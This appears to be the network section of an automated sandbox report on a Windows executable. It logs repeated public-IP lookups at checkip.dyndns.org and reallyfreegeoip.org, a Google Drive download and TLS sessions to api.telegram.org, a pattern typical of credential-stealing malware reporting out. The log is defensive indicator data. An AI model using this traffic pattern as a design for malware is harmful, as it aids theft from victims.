                                                                                                            Jan 10, 2025 21:41:58.920960903 CET5003180192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:58.921164989 CET5003180192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:41:58.925910950 CET8050031193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:59.693829060 CET8050031193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:41:59.695197105 CET50032443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:59.695241928 CET44350032149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:59.695336103 CET50032443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:59.695738077 CET50032443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:41:59.695755959 CET44350032149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:41:59.746562958 CET5003180192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:00.299566031 CET44350032149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:00.308396101 CET50032443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:00.308418989 CET44350032149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:00.308473110 CET50032443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:00.308481932 CET44350032149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:00.554507017 CET44350032149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:00.554609060 CET44350032149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:00.554781914 CET50032443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:00.555279016 CET50032443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:00.564040899 CET5003180192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:00.564522028 CET5003380192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:00.568943024 CET8050031193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:00.569319963 CET8050033193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:00.569458961 CET5003380192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:00.569467068 CET5003180192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:00.569521904 CET5003380192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:00.574259996 CET8050033193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:01.222454071 CET8050033193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:01.267803907 CET50034443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:01.267848015 CET44350034149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:01.267949104 CET50034443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:01.268228054 CET50034443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:01.268243074 CET44350034149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:01.277741909 CET5003380192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:01.889246941 CET44350034149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:01.891196966 CET50034443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:01.891242981 CET44350034149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:01.891319036 CET50034443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:01.891338110 CET44350034149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.309175968 CET44350034149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.309278965 CET44350034149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.309349060 CET50034443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:02.309771061 CET50034443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:02.312788010 CET5003380192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:02.313990116 CET5003580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:02.317724943 CET8050033193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.317806959 CET5003380192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:02.318763971 CET8050035193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.318933964 CET5003580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:02.319140911 CET5003580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:02.323996067 CET8050035193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.958204031 CET8050035193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.959719896 CET50036443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:02.959760904 CET44350036149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:02.959872961 CET50036443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:02.960241079 CET50036443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:02.960252047 CET44350036149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:03.012121916 CET5003580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:03.580976963 CET44350036149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:03.582865953 CET50036443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:03.582889080 CET44350036149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:03.586837053 CET50036443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:03.586843014 CET44350036149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:03.939192057 CET44350036149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:03.939274073 CET44350036149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:03.939336061 CET50036443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:06.873197079 CET50036443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:06.882195950 CET5003580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:06.882807970 CET5003780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:06.887294054 CET8050035193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:06.887342930 CET5003580192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:06.888098955 CET8050037193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:06.888156891 CET5003780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:06.888256073 CET5003780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:06.893105030 CET8050037193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:07.556528091 CET8050037193.122.6.168192.168.2.8
                                                                                                            Jan 10, 2025 21:42:07.557790995 CET50038443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:07.557847023 CET44350038149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:07.557928085 CET50038443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:07.558187008 CET50038443192.168.2.8149.154.167.220
                                                                                                            Jan 10, 2025 21:42:07.558202028 CET44350038149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:07.605879068 CET5003780192.168.2.8193.122.6.168
                                                                                                            Jan 10, 2025 21:42:08.980269909 CET44350038149.154.167.220192.168.2.8
                                                                                                            Jan 10, 2025 21:42:09.027718067 CET50038443192.168.2.8149.154.167.220
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Jan 10, 2025 21:41:03.556583881 CET6323553192.168.2.81.1.1.1
                                                                                                            Jan 10, 2025 21:41:03.762213945 CET53632351.1.1.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:04.996329069 CET6457253192.168.2.81.1.1.1
                                                                                                            Jan 10, 2025 21:41:05.003546000 CET53645721.1.1.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:08.787539959 CET6060853192.168.2.81.1.1.1
                                                                                                            Jan 10, 2025 21:41:08.796761036 CET53606081.1.1.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:10.246839046 CET6366253192.168.2.81.1.1.1
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET53636621.1.1.1192.168.2.8
                                                                                                            Jan 10, 2025 21:41:16.699421883 CET5699953192.168.2.81.1.1.1
                                                                                                            Jan 10, 2025 21:41:16.706104994 CET53569991.1.1.1192.168.2.8
                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 21:41:03.556583881 CET192.168.2.81.1.1.10x971fStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:04.996329069 CET192.168.2.81.1.1.10x9bf6Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:08.787539959 CET192.168.2.81.1.1.10x5375Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.246839046 CET192.168.2.81.1.1.10xced0Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:16.699421883 CET192.168.2.81.1.1.10x716bStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Jan 10, 2025 21:41:03.762213945 CET1.1.1.1192.168.2.80x971fNo error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:05.003546000 CET1.1.1.1192.168.2.80x9bf6No error (0)drive.usercontent.google.com216.58.206.65A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:08.796761036 CET1.1.1.1192.168.2.80x5375No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:08.796761036 CET1.1.1.1192.168.2.80x5375No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:08.796761036 CET1.1.1.1192.168.2.80x5375No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:08.796761036 CET1.1.1.1192.168.2.80x5375No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:08.796761036 CET1.1.1.1192.168.2.80x5375No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:08.796761036 CET1.1.1.1192.168.2.80x5375No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET1.1.1.1192.168.2.80xced0No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET1.1.1.1192.168.2.80xced0No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET1.1.1.1192.168.2.80xced0No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET1.1.1.1192.168.2.80xced0No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET1.1.1.1192.168.2.80xced0No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET1.1.1.1192.168.2.80xced0No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:10.256417036 CET1.1.1.1192.168.2.80xced0No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                            Jan 10, 2025 21:41:16.706104994 CET1.1.1.1192.168.2.80x716bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                            • drive.google.com
                                                                                                            • drive.usercontent.google.com
                                                                                                            • reallyfreegeoip.org
                                                                                                            • api.telegram.org
                                                                                                            • checkip.dyndns.org
                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.849819193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:08.810267925 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:09.614402056 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:09 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 21:41:09.618716002 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:41:09.803895950 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:09 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                            Jan 10, 2025 21:41:16.495522022 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:41:16.694782019 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:16 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            1192.168.2.849875193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:17.960401058 CET127OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Jan 10, 2025 21:41:18.613688946 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.849885193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:19.698868036 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:20.378555059 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:20 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.849898193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:21.495853901 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:22.121169090 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.849910193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:23.172087908 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:24.005698919 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:23 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.849924193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:24.928162098 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:25.634325027 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.849937193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:26.626281023 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:27.253050089 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:27 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            7192.168.2.849948193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:28.233841896 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:29.235835075 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            8192.168.2.849960193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:30.325670004 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:30.949132919 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            9192.168.2.849972193.122.6.168805856C:\Users\user\Desktop\xXUnP7uCBJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 21:41:31.891844988 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 21:41:32.517910957 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 20:41:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
